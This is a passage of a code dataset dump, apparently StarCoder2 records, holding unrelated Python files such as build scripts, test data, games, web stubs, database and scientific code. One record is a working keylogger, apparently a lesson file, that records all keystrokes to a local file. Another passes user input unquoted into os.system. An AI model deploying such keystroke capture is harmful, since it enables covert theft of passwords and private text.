'lib/client.py',\n # \"icon_resources\": [(1, \"lib/image/signal.ico\")]\n # }\n # ],\n \n console = [\n { \n \"script\" : 'lib/client.py',\n \"icon_resources\": [(1, \"lib/image/signal.ico\")]\n }\n ],\n package_dir = {'': 'lib'},\n packages = PACKAGES,\n #scripts=['client.py'],\n #console=[{'script' : 'client.py'}],\n options = {'py2exe': PY2EXE_OPTIONS}\n )\n #scripts=['client.py'],\n #console=[ { \n # \"script\" : 'client.py'\n # }\n # ],\n \n # zipfile = None,","sub_path":"example/setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":5016,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"533160158","text":"#!/usr/bin/env python\nimport pynput.keyboard\nlog = \"\"\n\n\ndef process_key_press(key):\n global log\n try:\n log = log + str(key.char)\n except 
AttributeError:\n if key == key.space:\n log = log+\" \"\n else:\n log = log + \" \"+str(key)+\" \"\n if len(log) == 100:\n with open(\"text.txt\", \"a\") as file_key:\n file_key.write(log)\n log = \"\"\n\n\nkeyboard = pynput.keyboard.Listener(on_press=process_key_press)\nwith keyboard:\n keyboard.join()","sub_path":"lesson10/Keylogger3.py","file_name":"Keylogger3.py","file_ext":"py","file_size_in_byte":504,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"218977107","text":"# -*- coding: utf-8; -*-\nfrom datetime import datetime\nfrom dateutil.relativedelta import relativedelta\nfrom random import randint\nfrom common.date_time import Date, format\nfrom common.string import replace_digit_with_letter\nfrom common.randomize import get_random_spacechar_filled_string as get_spaces\n\n\nvalid_age = datetime.today() - relativedelta(years=30)\ntestdata = [\n # 30 years before today\n Date(format(valid_age), True),\n # 18 years before today\n Date(format(datetime.today() - relativedelta(years=18)), True),\n # 18 years before today + 1 day\n Date(format(datetime.today() - relativedelta(years=18, days=-1)), False),\n # 100 years before today\n Date(format(datetime.today() - relativedelta(years=100)), True),\n # yesterday\n Date(format(datetime.today() - relativedelta(days=1)), False),\n # today\n Date(format(datetime.today()), False),\n # tomorrow\n Date(format(datetime.today() + relativedelta(days=1)), False),\n # 30 years before today with zeros in 'days'\n Date(valid_age.strftime(\"00.%m.%Y\"), False),\n # 30 years before today with zeros in 'month'\n Date(valid_age.strftime(\"%d.00.%Y\"), False),\n # 30 years before today with zeros in 'year'\n Date(valid_age.strftime(\"%d.%m.0000\"), False),\n # 30 years before today with incorrect day\n Date(valid_age.strftime(\"32.%m.%Y\"), False),\n # 30 years before today with incorrect month\n Date(valid_age.strftime(\"%d.13.%Y\"), False),\n # 30 years before today with text characters\n Date(replace_digit_with_letter(format(valid_age)), False),\n # 30 years before today with slashes as separators\n Date(valid_age.strftime(\"%d/%m/%Y\"), False),\n # 30 years before today without separators\n Date(valid_age.strftime(\"%d%m%Y\"), False),\n # 30 years before today with format differrent from \"DD.MM.YYYY\"\n Date(valid_age.strftime(\"%m%d%Y\"), False),\n # 30 years before today with short year\n Date(valid_age.strftime(\"%m%d%y\"), True),\n # data value made of spacechars\n Date(get_spaces(size=randint(1, 10)), False),\n # zero as date value\n Date(\"0\", False),\n # date made of zeros only\n Date(\"00.00.0000\", False),\n # special \"system zero\" date\n Date(\"01.01.1900\", False),\n # upper technology border\n Date(\"99.99.9999\", False),\n]\n","sub_path":"che-test/scripts/autotests/data/osago_date_birth.py","file_name":"osago_date_birth.py","file_ext":"py","file_size_in_byte":2292,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"287195465","text":"from turtle import Turtle\n\nFONT = (\"Courier\", 24, \"normal\")\nALIGNMENT = \"center\"\nwith open(\"snake_high_score.txt\", mode=\"r+\") as file:\n HIGH_SCORE = file.read()\n HIGH_SCORE = int(HIGH_SCORE)\n\nclass Scoreboard(Turtle):\n def __init__(self):\n super().__init__()\n self.high_score = HIGH_SCORE\n self.score = 0\n self.color(\"white\")\n self.penup()\n self.goto(0, 260)\n self.hideturtle()\n self.display_score()\n\n def display_score(self):\n self.clear()\n self.write(f\"Score: 
{self.score} High score: {self.high_score}\", align=ALIGNMENT, font=FONT)\n\n def increase_score(self):\n self.score += 1\n self.write(f\"Score: {self.score}\", align=ALIGNMENT, font=FONT)\n self.display_score()\n\n def reset_score(self):\n if self.score > self.high_score:\n self.high_score = self.score\n with open(\"snake_high_score.txt\", mode=\"w\") as file:\n file.write(f\"{self.high_score}\")\n self.score = 0\n self.display_score()\n\n # def game_over(self):\n # self.goto(0,0)\n # self.write(\"GAME OVER\", align=ALIGNMENT, font=FONT)\n","sub_path":"Day20/snake_scoreboard.py","file_name":"snake_scoreboard.py","file_ext":"py","file_size_in_byte":1166,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"177171270","text":"import time\n\nimport redis\nfrom flask import Flask\n\n\napp = Flask(__name__)\ncache = redis.Redis(host='redis', port=80)\n\n\n@app.route('/')\ndef hello():\n return 'Hello World!\\n'\n\nif __name__ == \"__main__\":\n app.run(host=\"192.168.1.15\", debug=True)\n","sub_path":"compose/compose.py","file_name":"compose.py","file_ext":"py","file_size_in_byte":249,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"382928748","text":"from selenium import webdriver\nfrom time import sleep\nfrom secrets import username, pw\n\nclass InstaBot:\n def __init__(self, username, pw):\n self.driver = webdriver.Chrome()\n self.username = username\n self.driver.get(\"https://instagram.com/\")\n sleep(2)\n self.driver.find_element_by_xpath('//*[@id=\"react-root\"]/section/main/article/div[2]/div[1]/div/form/div[2]/div/label/input')\\\n .send_keys(username)\n self.driver.find_element_by_xpath('//*[@id=\"react-root\"]/section/main/article/div[2]/div[1]/div/form/div[3]/div/label/input')\\\n .send_keys(pw)\n sleep(2)\n self.driver.find_element_by_xpath('//*[@id=\"react-root\"]/section/main/article/div[2]/div[1]/div/form/div[4]/button/div')\\\n .click()\n sleep(3)\n self.driver.find_element_by_xpath('/html/body/div[4]/div/div/div[3]/button[2]')\\\n .click()\n sleep(2)\n\nmy_bot = InstaBot(username, pw)","sub_path":"insta.py","file_name":"insta.py","file_ext":"py","file_size_in_byte":957,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"177592406","text":"\"\"\"This simple CRUD application performs the following operations sequentially:\n 1. Initializes a SQL database and table, using the cockroach sql CLI and a .sql file.\n 2. Creates 100 new accounts with randomly generated IDs and randomly-computed balance amounts.\n 3. Chooses two accounts at random and takes half of the money from the first and deposits it\n into the second.\n 4. 
Chooses five accounts at random and deletes them.\n\"\"\"\n\nimport random\nfrom math import floor\nimport uuid\nimport os\nfrom sqlalchemy_cockroachdb import run_transaction\nfrom sqlalchemy import create_engine\nfrom sqlalchemy.orm import sessionmaker\nfrom models import Account\n\n# The code below inserts new accounts.\n\n\ndef create_accounts(session, num):\n \"\"\"Create N new accounts with random account IDs and account balances.\n \"\"\"\n print(\"Creating new accounts...\")\n new_accounts = []\n while num > 0:\n account_id = uuid.uuid4()\n account_balance = floor(random.random()*1_000_000)\n new_accounts.append(Account(id=account_id, balance=account_balance))\n seen_account_ids.append(account_id)\n print(\"Created new account with id {0} and balance {1}.\".format(\n account_id, account_balance))\n num = num - 1\n session.add_all(new_accounts)\n\n\ndef transfer_funds_randomly(session, one, two):\n \"\"\"Transfer money between two accounts.\n \"\"\"\n source = session.query(Account).filter(Account.id == one).first()\n dest = session.query(Account).filter(Account.id == two).first()\n print(\"Random account balances:\\nAccount {0}: {1}\\nAccount {2}: {3}\".format(\n one, source.balance, two, dest.balance))\n\n amount = floor(source.balance/2)\n print(\"Transferring {0} from account {1} to account {2}...\".format(\n amount, one, two))\n\n # Check balance of the first account.\n if source.balance < amount:\n raise \"Insufficient funds in account {0}\".format(one)\n else:\n source.balance -= amount\n dest.balance += amount\n\n print(\"Transfer complete.\\nNew balances:\\nAccount {0}: {1}\\nAccount {2}: {3}\".format(\n one, source.balance, two, dest.balance))\n\n\ndef delete_accounts(session, num):\n \"\"\"Delete N existing accounts, at random.\n \"\"\"\n print(\"Deleting existing accounts...\")\n delete_ids = []\n while num > 0:\n delete_id = random.choice(seen_account_ids)\n delete_ids.append(delete_id)\n seen_account_ids.remove(delete_id)\n num = num - 1\n\n accounts = session.query(Account).filter(Account.id.in_(delete_ids)).all()\n\n for account in accounts:\n print(\"Deleted account {0}.\".format(account.id))\n session.delete(account)\n\n# Run the transfer inside a transaction.\n\n\nif __name__ == '__main__':\n\n conn_string = input('Enter your node\\'s connection string:\\n')\n # For cockroach demo:\n # postgres://demo:@127.0.0.1:26257?sslmode=require\n # For CockroachCloud:\n # postgres://:@:26257/.defaultdb?sslmode=verify-full&sslrootcert=/\n try:\n db_uri = os.path.expandvars(conn_string)\n\n print(\"Initializing the bank database...\")\n os.system('cockroach sql --url \\'{0}\\' -f dbinit.sql'.format(db_uri))\n print(\"Database initialized.\")\n\n psycopg_uri = db_uri.replace(\n 'postgres', 'cockroachdb').replace('26257?', '26257/bank?')\n # The \"cockroachdb://\" prefix for the engine URL indicates that we are\n # connecting to CockroachDB using the 'cockroachdb' dialect.\n # For more information, see\n # https://github.com/cockroachdb/sqlalchemy-cockroachdb.\n engine = create_engine(psycopg_uri)\n except Exception as e:\n print('Failed to connect to database.')\n print('{0}'.format(e))\n\n seen_account_ids = []\n\n run_transaction(sessionmaker(bind=engine),\n lambda s: create_accounts(s, 100))\n\n from_id = random.choice(seen_account_ids)\n to_id = random.choice([id for id in seen_account_ids if id != from_id])\n\n run_transaction(sessionmaker(bind=engine),\n lambda s: transfer_funds_randomly(s, from_id, to_id))\n\n run_transaction(sessionmaker(bind=engine), lambda s: 
delete_accounts(s, 5))\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":4262,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"88375007","text":"from odoo import api, fields, models\n\n\nclass VisitRecord(models.Model):\n _name = 'crm.record'\n _description = 'CRM Record'\n _inherit = ['crm.application']\n\n visit_time = fields.Date('拜访时间')\n communication_matter = fields.Char('沟通事项')\n leave_question = fields.Char('遗留问题')\n\n customer_response = fields.Selection(\n [('3', '非常满意'), ('2', '满意'), ('1', '一般'), ('0', '不满意')], '满意度'\n )\n customer_question = fields.Char('客户疑问')\n unsolved_problem = fields.Char('待解决问题')\n\n updated_version = fields.Char('方案更行')\n visit_way = fields.Selection([('0', '面谈'), ('1', '电话')], '拜访方式')\n upgrade_problem = fields.Char('升级问题')\n grade = fields.Selection([('A', '优秀'), ('B', '良好'), ('C', '有待提高')], '评分')\n\n @api.model\n def _default_stage(self):\n Stage = self.env['crm.record.stage']\n return Stage.search([], limit=1)\n\n @api.model\n def _group_expand_stage_id(self, stage, domain, order):\n return stage.search([], order=order)\n\n stage_id = fields.Many2one(\n 'crm.record.stage',\n default=_default_stage,\n group_expand='_group_expand_stage_id')\n\n state = fields.Selection(related='stage_id.state')\n","sub_path":"custom-addons/crm_activity/models/crm_record.py","file_name":"crm_record.py","file_ext":"py","file_size_in_byte":1301,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"267081018","text":"# encoding: utf-8\nfrom django import forms\nfrom django.db import models\nfrom apps.core.models import Menus\nfrom apps.core.widgets import CheckWidget\n\n\n\ndef make_custom_field(f):\n formfield = f.formfield()\n if isinstance(f, models.CharField):\n formfield.widget.attrs.update({'class': 'form-control'})\n return formfield\n\n\nclass BaseForm(forms.ModelForm):\n field_map = []#form排列顺序 [[\"name\",\"url\"],[\"icon\",\"active\"]]\n row_html = u\"
    {0}    \"\n    field_html = u\"    {1}{2}    \"\n    label_html = u\"\"\n    widget_html = u\"    {0}
    \"\n\n def as_bootstrap(self):\n result = \"\"\n for row in self.field_map:\n col_length = 12 / len(row) if len(row) > 0 else 12\n rowdata = \"\"\n for col in row:\n if col in self.fields.keys():\n field = self.fields[col]\n if isinstance(field.widget, forms.TextInput):\n label = self.label_html.format(col,field.label)\n widget = self.widget_html.format(self[col])\n f = self.field_html.format(col_length,label,widget)\n elif isinstance(field.widget, CheckWidget):\n f = self.field_html.format(col_length, self[col], \"\")\n rowdata += f\n result += self.row_html.format(rowdata)\n return result\n\n\nclass MenuForm(BaseForm):\n formfield_callback = make_custom_field\n field_map = [[\"name\",\"url\"],\n [\"icon\",\"active\"]]\n\n active = forms.CharField(widget=CheckWidget(label=u\"是否激活\"))\n class Meta:\n model = Menus\n fields = ('name','url','icon','active')","sub_path":"apps/core/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":1862,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"239441853","text":"# -*- coding: utf-8 -*-\n'''\nfrom IMGT res's SEQUENCE ID,\nadd information to the file using Original CSV file.\n\nUSAGE\n==========================================\npython this\n\n\n'''\nimport pprint\nimport csv\nimport sys\nsys.path.append('../Modules/Germline')\nimport re\nimport multiprocessing\nfrom germline import Germline\n\ndef make_dict_sub(file_path):\n\tdata = []\n\twith open(file_path) as fi:\n\t\treader = csv.reader(fi, delimiter=',')\n\t\treader.next()\n\t\tfor d in reader:\n\t\t\tdata.append(d)\n\treturn (file_path, data)\n\ndef make_dict(file_paths):\n\tp = multiprocessing.Pool(20)\n\t'''\n\targs :\n\t\tstring list\n\treturns :\n\t\tdict{\n\t\t\tstring(file path) : [csv data])\n\t\t}\n\t'''\n\n\tres = p.map(make_dict_sub, file_paths)\n\n\tdict_res = {}\n\tfor (file_path, data) in res:\n\t\tdict_res[file_path] = data\n\treturn dict_res\n\ndef fetch_path(file_name, file_paths):\n\tfor file_path in file_paths:\n\t\tif file_name in file_path:\n\t\t\treturn file_path\n\treturn file_name\n\ndef fetch_original_data(sequence_id, dict, file_paths):\n\telms = sequence_id.split('|')\n\tfile_name = elms[0]\n\tdata_idx = int(elms[2]) if len(elms) == 3 else int(elms[1])\n\tfile_path = fetch_path(file_name, file_paths)\n\treturn dict[file_path][data_idx]\n\ndef make_output(sequence_id, d, nb_of_mutation, dict_germline_v, dict_germline_j):\n\t'''\n\tcsv FORMAT : :\n\tCDR3(pep),V,VRefBegin,VRefEnd,VReadBegin,VReadEnd,D,DRefBegin,DRefEnd,DReadBegin,DReadEnd,J,JRefBegin,JRefEnd,JReadBegin,JReadEnd,C,CRefBegin,CRefEnd,CReadBegin,CReadEnd,joinedSeq,CDR3(nuc),copy\n\t24column\n\tor\n\tARTTSTVAPFDS,hIGHV2-26,*01(46-298)(0-252),hIGHD1-1,*01(4-10)(258-264),hIGHJ4,*02(4-48)(271-315),hIGHA2,*04(0-35)(315-350),agaccctcacgctgacccacaccgtctcggggttctccctcagcaatccgagaatgggtgtgagctggatCCGCCAGCCCCCGGGGAAGGCCCTGGAGTGGCTTGCACACATTATGTCGATTGACGAAATCTCGTACAGCACATCtctgaggagccggctcaccatctccaaggacacctccagaaaccaagttgtcctttccatgaccaacatggaccctgtggacacagccacctattactgtgcgcggacaacctcaactgtggccccctttgactcctggggccagggcaccctggtcaccgtctcctcagcatccccgaccagccccaaggtcttcccgctgagc,gcgcggacaacctcaactgtggccccctttgactcc,1\n\t12column\n\n\toutput\n\t=====================\n\t1.サンプルID\n\t2.CDR3のアミノ酸配列\n\t3.リード数\n\t4.ミスマッチ数(IMGTが計算)\n\t5.readの全長\n\t6.germlineのV\n\t7.germlineのVの配列\n\t8.germlineのJ\n\t9.germlineのJの配列\n\t=============================\n\t'''\n\tif len(d) == 24:\n\t\tsample_id = sequence_id.split('|')[0]\n\t\taa = d[0]\n\t\tread_cnt = 
d[-1]\n\t\tread_len = str(len(d[-3]))\n\t\tv_gene_name = d[1]\n\t\tv_region = dict_germline_v.get(v_gene_name[1:], '*')\n\t\tj_gene_name = d[11]\n\t\tj_region = dict_germline_j.get(j_gene_name[1:], '*')\n\t\tread = d[-3]\n\telif len(d) == 12:\n\t\tsample_id = sequence_id.split('|')[0]\n\t\taa = d[0]\n\t\tread_cnt = d[-1]\n\t\tread_len = str(len(d[-3]))\n\t\tv_gene_name = d[1] + d[2][0:3]\n\t\tv_region = dict_germline_v.get(v_gene_name[1:], '*')\n\t\tj_gene_name = d[5] + d[6][0:3]\n\t\tj_region = dict_germline_j.get(j_gene_name[1:], '*')\n\t\tread = d[-3]\n\telse:\n\t\tprint(d)\n\t\texit(1)\n\toutput = sample_id + '\\t' + aa + '\\t' + read_cnt + '\\t' + nb_of_mutation + '\\t' + read_len + '\\t' + v_gene_name + '\\t' + v_region + '\\t' + j_gene_name + '\\t' + j_region + '\\t' + read + '\\n'\n\treturn output\n\nif __name__ == '__main__':\n\ttsv_name_IgH = './input_IgH.txt'\n\ttsv_name_IgK = './input_IgK.txt'\n\tfile_paths = []\n\twith open(tsv_name_IgK) as tsv_IgK:\n\t\treader = csv.reader(tsv_IgK, delimiter='\\t')\n\t\tfor d in reader:\n\t\t\tif len(d) > 0 and 'csv' in d[0]:\n\t\t\t\tfile_paths.append(d[0])\n\twith open(tsv_name_IgH) as tsv_IgH:\n\t\treader = csv.reader(tsv_IgH, delimiter='\\t')\n\t\treader.next()\n\t\tfor d in reader:\n\t\t\tif len(d) > 0 and 'csv' in d[0]:\n\t\t\t\tfile_paths.append(d[0])\n\n\t'''\n\tremove the repetition in file_paths\n\t'''\n\tfile_paths = list(set(file_paths))\n\tpprint.pprint(file_paths)\n\n\t'''\n\tmake {filepath : data} dictionary\n\t'''\n\tdict = make_dict(file_paths)\n\n\timgt_res_IgH_name = './data/IgH_top1/8_V-REGION-nt-mutation-statistics.txt'\n\t#imgt_res_IgH_name = './data/IgH_head30_cut/8_V-REGION-nt-mutation-statistics.txt.test'\n\timgt_res_IgK_name = './data/IgK_maxread/8_V-REGION-nt-mutation-statistics.txt'\n\n\tdict_germlines_IGHV = Germline.get_germline_dict(Germline.get_germlines('IGHV'))\n\tdict_germlines_IGHJ = Germline.get_germline_dict(Germline.get_germlines('IGHJ'))\n\tdict_germlines_IGKV = Germline.get_germline_dict(Germline.get_germlines('IGKV'))\n\tdict_germlines_IGKJ = Germline.get_germline_dict(Germline.get_germlines('IGKJ'))\n\n\tpprint.pprint(dict_germlines_IGHV.keys())\n\tpprint.pprint(dict_germlines_IGHJ.keys())\n\tpprint.pprint(dict_germlines_IGKV.keys())\n\tpprint.pprint(dict_germlines_IGKJ.keys())\n\n\tHEADER = 'SAMPLE ID\\tAA\\tCOPY\\tMUTATION\\tLENGTH\\tV GENE\\tV REGION\\tJ JENE\\tJ REGION\\tREAD\\n'\n\t\n\tINDEX_NB_OF_SEQUENCE_ID = 1\n\tINDEX_NB_OF_MUTATION = 7\n\twith open(imgt_res_IgH_name) as imgt_res_IgH:\n\t\twith open('./data/IgH_summary.txt', 'w') as csv_res:\n\t\t\tcsv_res.write(HEADER)\n\t\t\treader = csv.reader(imgt_res_IgH, delimiter='\\t')\n\t\t\treader.next() #read through header\n\t\t\tfor d in reader:\n\t\t\t\tsequence_id = d[INDEX_NB_OF_SEQUENCE_ID]\n\t\t\t\tnb_of_mutation = re.sub(r'\\(.*\\)', '', d[INDEX_NB_OF_MUTATION])\n\t\t\t\td = fetch_original_data(sequence_id, dict, file_paths)\n\t\t\t\tcsv_res.write(make_output(sequence_id, d, nb_of_mutation, dict_germlines_IGHV, dict_germlines_IGHJ))\n\n\twith open(imgt_res_IgK_name) as imgt_res_IgK:\n\t\twith open('./data/IgK_summary.txt', 'w') as csv_res:\n\t\t\tcsv_res.write(HEADER)\n\t\t\treader = csv.reader(imgt_res_IgK, delimiter='\\t')\n\t\t\treader.next() #read through header\n\t\t\tfor d in reader:\n\t\t\t\tsequence_id = d[INDEX_NB_OF_SEQUENCE_ID]\n\t\t\t\tnb_of_mutation = re.sub(r'\\(.*\\)', '', d[INDEX_NB_OF_MUTATION])\n\t\t\t\td = fetch_original_data(sequence_id, dict, file_paths)\n\t\t\t\tcsv_res.write(make_output(sequence_id, d, 
nb_of_mutation, dict_germlines_IGKV, dict_germlines_IGKJ))\n","sub_path":"IMGT_Input/fetch_data.py","file_name":"fetch_data.py","file_ext":"py","file_size_in_byte":5735,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"388287238","text":"from bs4 import BeautifulSoup\nfrom url_parser import URLparser\nfrom url_list import List\nfrom post_wash import post_wash\nimport datetime\nfrom date_cut import date_cut\nimport tag\nfrom img_size import img_size\n\n\n\n#게시판 bs_page 을 받으면, 그 페이지의 bs_page 반환\ndef Parsing_list_url(URL, bs_page):\n\tList = []\n\n\tList.append(bs_page)\n\n\treturn List\n\n\n\n#포스트 url을 받으면, 그 포스트의 정보를 dictionary 형태로 반환\ndef Parsing_post_data(bs, URL):\n\tpost_data_prepare = []\n\tend_date = date_cut(URL['info'])\n\n\tposts = bs.findAll(\"div\", {\"class\": \"item article\"})\n\n\tfor post in posts:\n\t\tpost_infoes = post.findAll(\"a\")\t#td 묶음\n\n\t\tpost_data = {}\n\t\ttry:\n\t\t\ttitle = post_infoes[0].get_text(\" \", strip = True)\n\t\t\tauthor = post.find(\"strong\").text.strip()\n\t\t\tif author.find(\"관리자\") != -1:\n\t\t\t\tauthor = \"0\"\n\t\t\tdate = post.find(\"span\", {\"class\": \"date\"})\n\t\t\tdate = str(date).split(\">\")[1]\n\t\t\tdate = str(date).split(\"<\")[0]\n\t\t\tdate = date + \" 00:00:00\"\n\t\texcept:\n\t\t\ttitle = post_infoes[0].get_text(\" \", strip = True)\n\t\t\ttry:\n\t\t\t\tauthor = post.find(\"strong\").text.strip()\n\t\t\texcept:\n\t\t\t\tauthor = \"0\"\n\t\t\tif author.find(\"관리자\") != -1:\n\t\t\t\tauthor = \"0\"\n\t\t\tdate = post.find(\"span\", {\"class\": \"date\"})\n\t\t\tdate = str(date).split(\">\")[1]\n\t\t\tdate = str(date).split(\"<\")[0]\n\t\t\tdate = date + \" 00:00:00\"\n\t\ttry:\n\t\t\tdate = str(datetime.datetime.strptime(date, \"%Y-%m-%d %H:%M:%S\"))\n\t\texcept:\n\t\t\tdate = datetime.datetime.now().strftime(\"%Y-%m-%d\")\n\t\t\tdate = date + \" 00:00:00\"\n\t\ttry:\n\t\t\tphrase = post_infoes[1].get_text(\" \", strip = True)\n\t\texcept:\n\t\t\tphrase = \"0\"\n\t\tphrase = post_wash(phrase)\n\t\ttag_done = tag.tagging(URL, title)\n\t\turl = post.find(\"a\")[\"href\"]\n\t\t#뉴스 url 에 들어가서 img를 가져오기위한 작업\n\t\tdomain = Domain_check(url)\t#뉴스 url 도메인\n\t\tdriver_page = URLparser(url)\n\t\tbs_page = BeautifulSoup(driver_page, 'html.parser')\n\t\ttry:\n\t\t\timg = bs_page.find(\"head\").find(\"meta\", {\"property\": \"og:image\"})['content']\n\t\texcept:\n\t\t\ttry:\n\t\t\t\tif bs_page.find(\"body\").find(\"img\") is None:\n\t\t\t\t\timg = 1\n\t\t\t\telse:\n\t\t\t\t\timg = bs_page.find(\"body\").find(\"img\")['src']\n\t\t\t\t\tif 1000 <= len(img):\n\t\t\t\t\t\timg = 1\n\t\t\t\t\telse:\n\t\t\t\t\t\tif img.startswith(\"http://\") or img.startswith(\"https://\"):\t\t# img가 내부링크인지 외부 링크인지 판단.\n\t\t\t\t\t\t\tpass\n\t\t\t\t\t\telif img.startswith(\"//\"):\n\t\t\t\t\t\t\timg = \"http:\" + img\n\t\t\t\t\t\telse:\n\t\t\t\t\t\t\timg = domain + img\n\t\t\texcept:\n\t\t\t\t img = 1\n\t\tif img != 1:\n\t\t\tif img_size(img):\n\t\t\t\tpass\n\t\t\telse:\n\t\t\t\timg = 1\n\n\t\tpost_data['title'] = title.upper()\n\t\tpost_data['author'] = author.upper()\n\t\tpost_data['date'] = date\n\t\tpost_data['post'] = phrase.lower()\n\t\tpost_data['tag'] = tag_done\t\t# 태그1/태그2/태그3/태그4/.../ 같은 형식의 태그string이 들어간다.\n\t\tpost_data['img'] = img\n\t\tpost_data['url'] = url\n\n\t\tprint(date, \"::::\", title)\n\n\t\t#게시물의 날짜가 end_date 보다 옛날 글이면 continue, 최신 글이면 append\n\t\tif str(date) <= end_date:\n\t\t\tcontinue\n\t\telse:\n\t\t\tpost_data_prepare.append(post_data)\n\t\t\t\n\treturn 
post_data_prepare\n\n\n\n#url을 받으면 Page를 변환시켜서, 변환된 url 반환\ndef Change_page(url, page):\n\turl_done = url + str(page)\n\n\treturn url_done\n\n\n#입력된 url의 도메인 url 반환\ndef Domain_check(url):\n\tdomain = url.split('/')[0] + '//' + url.split('/')[2]\t#도메인 url 추출\n\n\treturn domain","sub_path":"src/sj_crawling/sj8.py","file_name":"sj8.py","file_ext":"py","file_size_in_byte":3330,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"343327981","text":"import numpy as np\nfrom scipy.integrate import ode\nfrom scipy.interpolate import interp1d\nimport warnings\n\nclass SeparateUniverseGrowthResponse2(object) :\n\t'''\n\tComputes time evolutions of the separate universe growth response sourced by linear CDM+baryon perturbations\n\tprecomputed in an instance of classy.Class. The growth response can be computed at each wave number tabulated\n\tin the transfer function interpolation tables accessed using Class.get_transfer. \n\t'''\n\tdef __init__(self, cls, quiet = False) :\n\t\t'''\n\t\tInitialization requires an instance of classy.Class that has 'output':'mTk, vTk' and 'z_pk' set early enough\n\t\tfor the initial conditions chosen in the SeparateUniverseGrowthResponse.getGrowthResponse method. The instance of\n\t\tclassy.Class must already be computed.\n\t\t'''\n\t\tself.cls = cls\n\t\tself.quiet = quiet\n\t\tif 'gauge' in cls.pars and ('new' in cls.pars['gauge'] or 'New' in cls.pars['gauge']) :\n\t\t\traise Exception('Error: SeparateUniverseGrowthResponse instance of classy.Class must be computed in the synchronous gause')\n\t\tif not 'vTk' in self.cls.pars['output'] or not ('mTk' in self.cls.pars['output'] or 'dTk' in self.cls.pars['output']) :\n\t\t\traise Exception('Error: SeparateUniverseGrowthResponse instance of classy.Class \\'output\\' must contain \\'mTk\\' and \\'vTk\\'')\n\t\tif self.cls.pars['extra_metric_transfer_functions'] != 'yes' :\n\t\t\traise Exception('Error: SeparateUniverseGrowthResponse instance of classy.Class must have \\'extra_metric_transfer_functions\\':\\'yes\\'')\n\t\tif 'z_pk' in self.cls.pars :\n\t\t\tself.z_max = np.max([float(tz) for tz in str( self.cls.pars['z_pk']).split(',')])\n\t\t\tif 'z_max_pk' in self.cls.pars :\n\t\t\t\tself.z_max = np.max([float(self.cls.pars['z_max_pk']), self.z_max])\n\t\telif 'z_max_pk' in self.cls.pars :\n\t\t\t\tself.z_max = float(self.cls.pars['z_max_pk'])\n\t\telse :\n\t\t\traise Exception('Error: SeparateUniverseGrowthResponse instance of classy.Class must have \\'z_pk\\' or \\'z_max_pk\\'')\n\t\tif self.cls.get_transfer() == {} :\n\t\t\traise Exception('Error: SeparateUniverseGrowthResponse instance of classy.Class must be computed before initialization')\t\t\n\t\t#\n\t\t# Background\n\t\t#\n\t\tbg_loga = -np.log(1. + self.cls.get_background()['z'])\n\t\tbg_loga[-1] = 0.\n\t\tself.fb = self.cls.Omega_b() / (self.cls.Omega_b() + self.cls.Omega0_cdm())\n\t\tself.fc = 1. - self.fb\n\t\tself.H = interp1d(bg_loga, self.cls.get_background()['H [1/Mpc]'])\n\t\tself.zeq = self.cls.z_eq()\n\t\tif self.zeq > self.z_max and not self.quiet:\n\t\t\twarnings.warn('SeparateUniverseGrowthResponse.__init__ instance of classy.Class does not compute perturbations early enough' +\n\t\t\t\t\t\t 'for radiation dominated era initial conditions')\n\t\t#\n\t\t# Separate universe growth response ODE coefficients\n\t\t#\n\t\tf = self.cls.get_background()['gr.fac. 
f']\n\t\tw = self.cls.get_background()['(.)p_tot'] / self.cls.get_background()['(.)rho_tot']\n\t\tOmega_cb = (self.cls.get_background()['(.)rho_cdm'] + self.cls.get_background()['(.)rho_b']) / self.cls.get_background()['(.)rho_crit']\n\t\tself.drag = interp1d(bg_loga, 0.5 * (1. - 3. * w + 4. * f))\n\t\tself.source1 = interp1d(bg_loga, 1.5 * Omega_cb)\n\t\tself.source2 = interp1d(bg_loga, 2. / 3. * f)\n\t\t#\n\t\t# Thermodynamics\n\t\t#\n\t\tth_loga = -np.log(1. + self.cls.get_thermodynamics()['z'])\n\t\tself.w_b = interp1d(th_loga, self.cls.get_thermodynamics()['w_b'])\n\t\tself.c2_b = interp1d(th_loga, self.cls.get_thermodynamics()['c_b^2'])\n\t\t\n\tdef getSourceMode(self, loga, k_ind) :\n\t\t'''\n\t\tInterpolates the CDM+baryon perturbation and its first derivative with respect to log(a) for the mode \n\t\twhose wave number is self.cls.get_transfer(z)['k (h/Mpc)'][k_ind] at log-scale factor log(a) = loga\n\t\t'''\n\t\tz = np.exp(-loga) - 1.\n\t\ttry :\n\t\t\tH = self.H(loga)\n\t\t\tc2_b = self.c2_b(loga)\n\t\t\tw_b = self.w_b(loga)\n\t\t\ttf = self.cls.get_transfer(z)\n\t\texcept ValueError as e :\n\t\t\traise Exception(\"Error, redshift %.6e out of interpolation bounds\", z)\n\t\tdelta_cdm = -tf['d_cdm'][k_ind]\n\t\td_delta_cdm_d_loga = 0.5 * tf['h_prime'][k_ind] * (1. + z) / self.H(loga)\n\t\tdelta_b = -tf['d_b'][k_ind]\n\t\td_delta_b_d_loga = -0. * (c2_b - w_b) * delta_b + (1. + w_b) * (tf['t_b'][k_ind] * (1. + z) / H + d_delta_cdm_d_loga)\n\t\treturn self.fc * delta_cdm + self.fb * delta_b, self.fc * d_delta_cdm_d_loga + self.fb * d_delta_b_d_loga\n\n\tdef getGrowthResponse(self, k_ind, logai 